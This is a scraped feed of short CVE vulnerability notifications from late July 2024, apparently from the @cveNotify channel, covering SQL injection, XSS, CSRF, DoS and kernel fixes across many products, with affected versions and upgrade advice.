🚨 CVE-2024-40334idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/serverFile_deal.php?mudi=upFileDel&dataID=3🎖@cveNotify |
|
| 2024-07-31 14:37:24 |
🚨 CVE-2024-34443Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in ThemePunch OHG Slider Revolution allows Stored XSS.This issue affects Slider Revolution: from n/a before 6.7.11.🎖@cveNotify |
|
| 2024-07-31 13:37:25 |
🚨 CVE-2024-6208The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm_all_packages' shortcode in all versions up to, and including, 3.2.97 due to insufficient input sanitization and output escaping on the 'cols' parameter. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-31 13:37:24 |
🚨 CVE-2024-39379Acrobat for Edge versions 126.0.2592.81 and earlier are affected by an out-of-bounds read vulnerability that could lead to arbitrary file system read access. An attacker could exploit this vulnerability to read contents from a location in memory past the buffer boundary, potentially leading to sensitive information disclosure. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-07-31 13:07:42 |
🚨 CVE-2024-7208Hosted services do not verify the sender of an email against authenticated users, allowing an attacker to spoof the identify of another user's email address.🎖@cveNotify |
|
| 2024-07-31 13:07:41 |
🚨 CVE-2024-41944Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the `report/data/proofofplayReport` API route inside the CMS. This allows an authenticated user to to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values in to the `sortBy` parameter. Users should upgrade to version 3.3.12 or 4.0.14 which fix this issue.🎖@cveNotify |
|
| 2024-07-31 13:07:40 |
🚨 CVE-2024-41916A vulnerability exists in ClearPass Policy Manager that allows for an attacker with administrative privileges to access sensitive information in a cleartext format. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager.🎖@cveNotify |
|
| 2024-07-31 13:07:37 |
🚨 CVE-2023-38001IBM Aspera Orchestrator 4.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 260206.🎖@cveNotify |
|
| 2024-07-31 13:07:36 |
🚨 CVE-2023-26288IBM Aspera Orchestrator 4.0.1 does not invalidate session after a password change which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 248477.🎖@cveNotify |
|
| 2024-07-31 13:07:35 |
🚨 CVE-2022-33167IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie. IBM X-Force ID: 228587.🎖@cveNotify |
|
| 2024-07-31 13:07:32 |
🚨 CVE-2024-41804Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the API route inside the CMS responsible for Adding/Editing DataSet Column Formulas. This allows an authenticated user to to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values in to the `formula` parameter. Users should upgrade to version 3.3.12 or 4.0.14 which fix this issue.🎖@cveNotify |
|
| 2024-07-31 13:07:31 |
🚨 CVE-2024-41802Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the API routes inside the CMS responsible for Filtering DataSets. This allows an authenticated user to to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values in to the APIs for importing JSON and importing a Layout containing DataSet data.Users should upgrade to version 3.3.12 or 4.0.14 which fix this issue🎖@cveNotify |
|
| 2024-07-31 13:07:30 |
🚨 CVE-2024-41109Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. Navigating to `/admin/index/statistics` with a logged in Pimcore user exposes information about the Pimcore installation, PHP version, MYSQL version, installed bundles and all database tables and their row count in the system. This vulnerability is fixed in 1.5.2, 1.4.6, and 1.3.10.🎖@cveNotify |
|
| 2024-07-31 13:07:26 |
🚨 CVE-2024-37165Discourse is an open source discussion platform. Prior to 3.2.3 and 3.3.0.beta3, improperly sanitized Onebox data could lead to an XSS vulnerability in some situations. This vulnerability only affects Discourse instances which have disabled the default Content Security Policy. This vulnerability is fixed in 3.2.3 and 3.3.0.beta3.🎖@cveNotify |
|
| 2024-07-31 13:07:25 |
🚨 CVE-2024-38909Studio 42 elFinder 2.1.64 is vulnerable to Incorrect Access Control. Copying files with an unauthorized extension between server directories allows an arbitrary attacker to expose secrets, perform RCE, etc.🎖@cveNotify |
|
| 2024-07-31 13:07:24 |
🚨 CVE-2024-23091Weak password hashing using MD5 in funzioni.php in HotelDruid before 1.32 allows an attacker to obtain plaintext passwords from hash values.🎖@cveNotify |
|
| 2024-07-31 11:37:30 |
🚨 CVE-2024-7135The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.🎖@cveNotify |
|
| 2024-07-31 11:37:26 |
🚨 CVE-2024-4076Client queries that trigger serving stale data and that also require lookups in local authoritative zone data may result in an assertion failure.This issue affects BIND 9 versions 9.16.13 through 9.16.50, 9.18.0 through 9.18.27, 9.19.0 through 9.19.24, 9.11.33-S1 through 9.11.37-S1, 9.16.13-S1 through 9.16.50-S1, and 9.18.11-S1 through 9.18.27-S1.🎖@cveNotify |
|
| 2024-07-31 11:37:25 |
🚨 CVE-2024-1737Resolver caches and authoritative zone databases that hold significant numbers of RRs for the same hostname (of any RTYPE) can suffer from degraded performance as content is being added or updated, and also when handling client queries for this name.This issue affects BIND 9 versions 9.11.0 through 9.11.37, 9.16.0 through 9.16.50, 9.18.0 through 9.18.27, 9.19.0 through 9.19.24, 9.11.4-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.50-S1, and 9.18.11-S1 through 9.18.27-S1.🎖@cveNotify |
|
| 2024-07-31 11:37:24 |
🚨 CVE-2024-0760A malicious client can send many DNS messages over TCP, potentially causing the server to become unstable while the attack is in progress. The server may recover after the attack ceases. Use of ACLs will not mitigate the attack. This issue affects BIND 9 versions 9.18.1 through 9.18.27, 9.19.0 through 9.19.24, and 9.18.11-S1 through 9.18.27-S1.🎖@cveNotify |
|
| 2024-07-31 10:37:25 |
🚨 CVE-2024-7309A vulnerability was found in SourceCodester Record Management System 1.0. It has been classified as problematic. This affects an unknown part of the file entry.php. The manipulation of the argument school leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273201 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-31 10:37:24 |
🚨 CVE-2024-7264libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing anASN.1 Generalized Time field. If given an syntactically incorrect field, theparser might end up using -1 for the length of the *time fraction*, leading toa `strlen()` getting performed on a pointer to a heap buffer area that is not(purposely) null terminated.This flaw most likely leads to a crash, but can also lead to heap contentsgetting returned to the application when[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.🎖@cveNotify |
|
| 2024-07-31 09:37:30 |
🚨 CVE-2024-7307A vulnerability has been found in SourceCodester Establishment Billing Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /manage_billing.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273199.🎖@cveNotify |
|
| 2024-07-31 09:37:26 |
🚨 CVE-2024-37129Dell Inventory Collector, versions prior to 12.3.0.6 contains a Path Traversal vulnerability. A local authenticated malicious user could potentially exploit this vulnerability, leading to arbitrary code execution on the system.🎖@cveNotify |
|
| 2024-07-31 09:37:25 |
🚨 CVE-2024-32857Dell Peripheral Manager, versions prior to 1.7.6, contain an uncontrolled search path element vulnerability. An attacker could potentially exploit this vulnerability through preloading malicious DLL or symbolic link exploitation, leading to arbitrary code execution and escalation of privilege🎖@cveNotify |
|
| 2024-07-31 09:37:24 |
🚨 CVE-2024-2508The WP Mobile Menu plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_menu_item_icon function in all versions up to, and including, 2.8.4.4. This makes it possible for unauthenticated attackers to add the '_mobmenu_icon' post meta to arbitrary posts with an arbitrary (but sanitized) value. NOTE: Version 2.8.4.4 contains a partial fix for this vulnerability.🎖@cveNotify |
|
| 2024-07-31 08:37:25 |
🚨 CVE-2024-7264libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing anASN.1 Generalized Time field. If given an syntactically incorrect field, theparser might end up using -1 for the length of the *time fraction*, leading toa `strlen()` getting performed on a pointer to a heap buffer area that is not(purposely) null terminated.This flaw most likely leads to a crash, but can also lead to heap contentsgetting returned to the application when[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.🎖@cveNotify |
|
| 2024-07-31 08:37:24 |
🚨 CVE-2023-28074Dell BSAFE Crypto-C Micro Edition 4.1.5 and Dell BSAFE Micro Edition Suite, versions 4.0 through 4.6.1 and version 5.0 contain a buffer over-read vulnerability.🎖@cveNotify |
|
| 2024-07-31 07:37:25 |
🚨 CVE-2024-7299** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Bolt CMS 3.7.1. It has been rated as problematic. This issue affects some unknown processing of the file /preview/page of the component Entry Preview Handler. The manipulation of the argument body leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273167. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.🎖@cveNotify |
|
| 2024-07-31 07:37:24 |
🚨 CVE-2024-6980A verbose error handling issue in the proxy service implemented in the GravityZone Update Server allows an attacker to cause a server-side request forgery. This issue only affects GravityZone Console versions before 6.38.1-5 running only on premise.🎖@cveNotify |
|
| 2024-07-31 06:37:32 |
🚨 CVE-2024-7290A vulnerability classified as critical has been found in SourceCodester Establishment Billing Management System 1.0. This affects an unknown part of the file /manage_tenant.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273159.🎖@cveNotify |
|
| 2024-07-31 06:37:31 |
🚨 CVE-2024-7205When the device is shared, the homepage module are before 2.19.0 in eWeLink Cloud Service allows Secondary user to take over devices as primary user via sharing unnecessary device-sensitive information.🎖@cveNotify |
|
| 2024-07-31 06:37:30 |
🚨 CVE-2024-6695it's possible for an attacker to gain administrative access without having any kind of account on the targeted site and perform unauthorized actions. This is due to improper logic flow on the user registration process.🎖@cveNotify |
|
| 2024-07-31 06:37:26 |
🚨 CVE-2024-6408The Slider by 10Web WordPress plugin before 1.2.57 does not sanitise and escape its Slider Title, which could allow high privilege users such as editors and above to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-07-31 06:37:25 |
🚨 CVE-2024-6165The WANotifier WordPress plugin before 2.6.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-31 06:37:24 |
🚨 CVE-2024-42381os/linux/elf.rb in Homebrew brew before 4.2.20 uses ldd to load ELF files obtained from untrusted sources, which allows attackers to achieve code execution via an ELF file with a custom .interp section. NOTE: this code execution would occur during an un-sandboxed binary relocation phase, which occurs before a user would expect execution of downloaded package content. (237d1e783f7ee261beaba7d3f6bde22da7148b0a was the tested vulnerable version.)🎖@cveNotify |
|
| 2024-07-31 05:37:25 |
🚨 CVE-2024-7288A vulnerability was found in SourceCodester Establishment Billing Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /ajax.php?action=delete_block. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273157 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-31 05:37:24 |
🚨 CVE-2024-7287A vulnerability was found in SourceCodester Establishment Billing Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273156.🎖@cveNotify |
|
| 2024-07-31 04:37:31 |
🚨 CVE-2024-7286A vulnerability was found in SourceCodester Establishment Billing Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/ajax.php?action=login of the component Login. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273155.🎖@cveNotify |
|
| 2024-07-31 04:37:30 |
🚨 CVE-2024-39950A vulnerability has been found in Dahua products. Attackers can send carefully crafted data packets to the interface with vulnerabilities to initiate device initialization.🎖@cveNotify |
|
| 2024-07-31 04:37:29 |
🚨 CVE-2024-39949A vulnerability has been found in Dahua products. Attackers can send carefully crafted data packets to the interface with vulnerabilities, causing the device to crash.🎖@cveNotify |
|
| 2024-07-31 04:37:26 |
🚨 CVE-2024-39947A vulnerability has been found in Dahua products.After obtaining the ordinary user's username and password, the attacker can send a carefully crafted data packet to the interface with vulnerabilities, causing the device to crash.🎖@cveNotify |
|
| 2024-07-31 04:37:25 |
🚨 CVE-2024-39945A vulnerability has been found in Dahua products. Afterobtaining the administrator's username and password, the attacker can send acarefully crafted data packet to the interface with vulnerabilities, causingthe device to crash.🎖@cveNotify |
|
| 2024-07-31 04:37:24 |
🚨 CVE-2024-39944A vulnerability has been found in Dahua products.Attackerscan send carefully crafted data packets to the interface with vulnerabilities,causing the device to crash.🎖@cveNotify |
|
| 2024-07-31 03:37:25 |
🚨 CVE-2024-7284A vulnerability, which was classified as problematic, was found in SourceCodester Lot Reservation Management System 1.0. This affects an unknown part of the file /admin/ajax.php?action=save_settings. The manipulation of the argument about leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273153 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-31 03:37:24 |
🚨 CVE-2024-7283A vulnerability, which was classified as critical, has been found in SourceCodester Lot Reservation Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273152.🎖@cveNotify |
|
| 2024-07-31 02:37:25 |
🚨 CVE-2024-7282A vulnerability classified as critical was found in SourceCodester Lot Reservation Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/manage_model.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273151.🎖@cveNotify |
|
| 2024-07-31 02:37:24 |
🚨 CVE-2024-7281A vulnerability classified as critical has been found in SourceCodester Lot Reservation Management System 1.0. Affected is an unknown function of the file /admin/index.php?page=manage_lot. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-273150 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-31 01:37:25 |
🚨 CVE-2024-7278A vulnerability was found in itsourcecode Alton Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/team_save.php. The manipulation of the argument team leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273147.🎖@cveNotify |
|
| 2024-07-31 01:37:24 |
🚨 CVE-2024-6255A vulnerability in the JSON file handling of gaizhenbiao/chuanhuchatgpt version 20240410 allows any user to delete any JSON file on the server, including critical configuration files such as `config.json` and `ds_config_chatbot.json`. This issue arises due to improper validation of file paths, enabling directory traversal attacks. An attacker can exploit this vulnerability to disrupt the functioning of the system, manipulate settings, or potentially cause data loss or corruption.🎖@cveNotify |
|
| 2024-07-31 01:07:24 |
🚨 CVE-2024-37085VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.🎖@cveNotify |
|
| 2024-07-31 00:37:24 |
🚨 CVE-2024-7277A vulnerability was found in itsourcecode Alton Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/menu.php of the component Add a Menu. The manipulation of the argument image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273146 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-30 23:37:25 |
🚨 CVE-2024-7276A vulnerability has been found in itsourcecode Alton Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/member_save.php. The manipulation of the argument last/first leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273145 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-30 23:37:24 |
🚨 CVE-2024-7275A vulnerability, which was classified as critical, was found in itsourcecode Alton Management System 1.0. Affected is an unknown function of the file /admin/category_save.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273144.🎖@cveNotify |
|
| 2024-07-30 22:37:25 |
🚨 CVE-2024-40576Cross Site Scripting vulnerability in Best House Rental Management System 1.0 allows a remote attacker to execute arbitrary code via the "House No" and "Description" parameters in the houses page at the index.php component.🎖@cveNotify |
|
| 2024-07-30 22:37:24 |
🚨 CVE-2024-39552An Improper Handling of Exceptional Conditions vulnerability in the routing protocol daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows a network based, unauthenticated attacker to cause the RPD process to crash leading to a Denial of Service (DoS).When a malformed BGP UPDATE packet is received over an established BGP session, RPD crashes and restarts.Continuous receipt of the malformed BGP UPDATE messages will create a sustained Denial of Service (DoS) condition for impacted devices.This issue affects eBGP and iBGP, in both IPv4 and IPv6 implementations. This issue requires a remote attacker to have at least one established BGP session.This issue affects: Juniper Networks Junos OS: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3; * 23.2 versions earlier than 23.2R2.Juniper Networks Junos OS Evolved: * All versions earlier than 21.2R3-S7; * 21.3-EVO versions earlier than 21.3R3-S5; * 21.4-EVO versions earlier than 21.4R3-S8; * 22.1-EVO versions earlier than 22.1R3-S4; * 22.2-EVO versions earlier than 22.2R3-S3; * 22.3-EVO versions earlier than 22.3R3-S2; * 22.4-EVO versions earlier than 22.4R3; * 23.2-EVO versions earlier than 23.2R2.🎖@cveNotify |
|
| 2024-07-30 21:37:25 |
🚨 CVE-2024-7273A vulnerability classified as critical was found in itsourcecode Alton Management System 1.0. This vulnerability affects unknown code of the file search.php. The manipulation of the argument rcode leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273142 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-30 21:37:24 |
🚨 CVE-2024-38983Prototype Pollution in alykoshin mini-deep-assign v0.0.8 allows an attacker to execute arbitrary code or cause a Denial of Service (DoS) and cause other impacts via the _assign() method at (/lib/index.js:91)🎖@cveNotify |
|
| 2024-07-30 21:07:25 |
🚨 CVE-2024-5664The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute within the plugin's sonaar_audioplayer shortcode in all versions up to, and including, 5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-30 20:37:32 |
🚨 CVE-2024-42225In the Linux kernel, the following vulnerability has been resolved:wifi: mt76: replace skb_put with skb_put_zeroAvoid potentially reusing uninitialized data🎖@cveNotify |
|
| 2024-07-30 20:37:26 |
🚨 CVE-2024-41707An issue was discovered in Archer Platform 6 before 2024.06. Authenticated users can achieve HTML content injection. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application.🎖@cveNotify |
|
| 2024-07-30 20:37:25 |
🚨 CVE-2024-41110Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low.Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.A security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted.Docker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable.docker-ce v27.1.1 containes patches to fix the vulnerability. Patches have also been merged into the master, 19.03, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches. If one is unable to upgrade immediately, avoid using AuthZ plugins and/or restrict access to the Docker API to trusted parties, following the principle of least privilege.🎖@cveNotify |
|
| 2024-07-30 20:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-30 20:07:24 |
🚨 CVE-2024-42229In the Linux kernel, the following vulnerability has been resolved:crypto: aead,cipher - zeroize key buffer after useI.G 9.7.B for FIPS 140-3 specifies that variables temporarily holdingcryptographic information should be zeroized once they are no longerneeded. Accomplish this by using kfree_sensitive for buffers thatpreviously held the private key.🎖@cveNotify |
|
| 2024-07-30 19:37:32 |
🚨 CVE-2024-41438A heap buffer overflow in the function cp_stored() (/vendor/cute_png.h) of hicolor v0.5.0 allows attackers to cause a Denial of Service (DoS) via a crafted PNG file.🎖@cveNotify |
|
| 2024-07-30 19:37:26 |
🚨 CVE-2024-41437A heap buffer overflow in the function cp_unfilter() (/vendor/cute_png.h) of hicolor v0.5.0 allows attackers to cause a Denial of Service (DoS) via a crafted PNG file.🎖@cveNotify |
|
| 2024-07-30 19:37:25 |
🚨 CVE-2024-42230In the Linux kernel, the following vulnerability has been resolved:powerpc/pseries: Fix scv instruction crash with kexeckexec on pseries disables AIL (reloc_on_exc), required for scvinstruction support, before other CPUs have been shut down. This meansthey can execute scv instructions after AIL is disabled, which causes aninterrupt at an unexpected entry location that crashes the kernel.Change the kexec sequence to disable AIL after other CPUs have beenbrought down.As a refresher, the real-mode scv interrupt vector is 0x17000, and thefixed-location head code probably couldn't easily deal with implementingsuch high addresses so it was just decided not to support that interruptat all.🎖@cveNotify |
|
| 2024-07-30 19:37:24 |
🚨 CVE-2024-40767In OpenStack Nova before 27.4.1, 28 before 28.2.1, and 29 before 29.1.1, by supplying a raw format image that is actually a crafted QCOW2 image with a backing file path or VMDK flat image with a descriptor file path, an authenticated user may convince systems to return a copy of the referenced file's contents from the server, resulting in unauthorized access to potentially sensitive data. All Nova deployments are affected. NOTE: this issue exists because of an incomplete fix for CVE-2022-47951 and CVE-2024-32498.🎖@cveNotify |
|
| 2024-07-30 19:07:30 |
🚨 CVE-2024-42069In the Linux kernel, the following vulnerability has been resolved:net: mana: Fix possible double free in error handling pathWhen auxiliary_device_add() returns error and then callsauxiliary_device_uninit(), callback function adev_releasecalls kfree(madev). We shouldn't call kfree(madev) againin the error handling path. Set 'madev' to NULL.🎖@cveNotify |
|
| 2024-07-30 19:07:29 |
🚨 CVE-2024-42068In the Linux kernel, the following vulnerability has been resolved:bpf: Take return from set_memory_ro() into account with bpf_prog_lock_ro()set_memory_ro() can fail, leaving memory unprotected.Check its return and take it into account as an error.🎖@cveNotify |
|
| 2024-07-30 19:07:26 |
🚨 CVE-2024-42066In the Linux kernel, the following vulnerability has been resolved:drm/xe: Fix potential integer overflow in page size calculationExplicitly cast tbo->page_alignment to u64 before bit-shifting toprevent overflow when assigning to min_page_size.🎖@cveNotify |
|
| 2024-07-30 19:07:25 |
🚨 CVE-2024-42064In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Skip pipe if the pipe idx not set properly[why]Driver crashes when pipe idx not set properly[how]Add code to skip the pipe that idx not set properly🎖@cveNotify |
|
| 2024-07-30 19:07:24 |
🚨 CVE-2024-3246The LiteSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0.1. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the token setting and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-30 18:37:25 |
🚨 CVE-2024-41305A Server-Side Request Forgery (SSRF) in the Plugins Page of WonderCMS v3.4.3 allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the pluginThemeUrl parameter.🎖@cveNotify |
|
| 2024-07-30 18:37:24 |
🚨 CVE-2024-41304An arbitrary file upload vulnerability in the uploadFileAction() function of WonderCMS v3.4.3 allows attackers to execute arbitrary code via a crafted SVG file.🎖@cveNotify |
|
| 2024-07-30 17:37:35 |
🚨 CVE-2024-7209A vulnerability exists in the use of shared SPF records in multi-tenant hosting providers, allowing attackers to use network authorization to be abused to spoof the email identify of the sender.🎖@cveNotify |
|
| 2024-07-30 17:37:31 |
🚨 CVE-2024-41944Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the `report/data/proofofplayReport` API route inside the CMS. This allows an authenticated user to to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values in to the `sortBy` parameter. Users should upgrade to version 3.3.12 or 4.0.14 which fix this issue.🎖@cveNotify |
|
| 2024-07-30 17:37:30 |
🚨 CVE-2024-41915A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct SQL injection attacks against the ClearPass Policy Manager instance. An attacker could exploit this vulnerability to obtain and modify sensitive information in the underlying database potentially leading to complete compromise of the ClearPass Policy Manager cluster.🎖@cveNotify |
|
| 2024-07-30 17:37:26 |
🚨 CVE-2023-26289IBM Aspera Orchestrator 4.0.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 248478.🎖@cveNotify |
|
| 2024-07-30 17:37:25 |
🚨 CVE-2022-33167IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie. IBM X-Force ID: 228587.🎖@cveNotify |
|
| 2024-07-30 17:37:24 |
🚨 CVE-2021-25650A privilege escalation vulnerability was discovered in Avaya Aura Utility Services that may potentially allow a local user to execute specially crafted scripts as a privileged user. Affects all 7.x versions of Avaya Aura Utility Services🎖@cveNotify |
|
| 2024-07-30 16:37:32 |
🚨 CVE-2024-41804Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the API route inside the CMS responsible for Adding/Editing DataSet Column Formulas. This allows an authenticated user to to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values in to the `formula` parameter. Users should upgrade to version 3.3.12 or 4.0.14 which fix this issue.🎖@cveNotify |
|
| 2024-07-30 16:37:31 |
🚨 CVE-2024-41802Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the API routes inside the CMS responsible for Filtering DataSets. This allows an authenticated user to to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values in to the APIs for importing JSON and importing a Layout containing DataSet data.Users should upgrade to version 3.3.12 or 4.0.14 which fix this issue🎖@cveNotify |
|
| 2024-07-30 16:37:30 |
🚨 CVE-2024-6906A vulnerability was found in SourceCodester Record Management System 1.0 and classified as critical. This issue affects some unknown processing of the file add_leave_non_user.php. The manipulation of the argument LSS leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271931.🎖@cveNotify |
|
| 2024-07-30 16:37:26 |
🚨 CVE-2024-6904A vulnerability, which was classified as critical, was found in SourceCodester Record Management System 1.0. This affects an unknown part of the file sort2_user.php. The manipulation of the argument qualification leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271929 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-30 16:37:25 |
🚨 CVE-2023-45935Qt 6 through 6.6 was discovered to contain a NULL pointer dereference via the function QXcbConnection::initializeAllAtoms(). NOTE: this is disputed because it is not expected that an X application should continue to run when there is arbitrary anomalous behavior from the X server.🎖@cveNotify |
|
| 2024-07-30 16:37:24 |
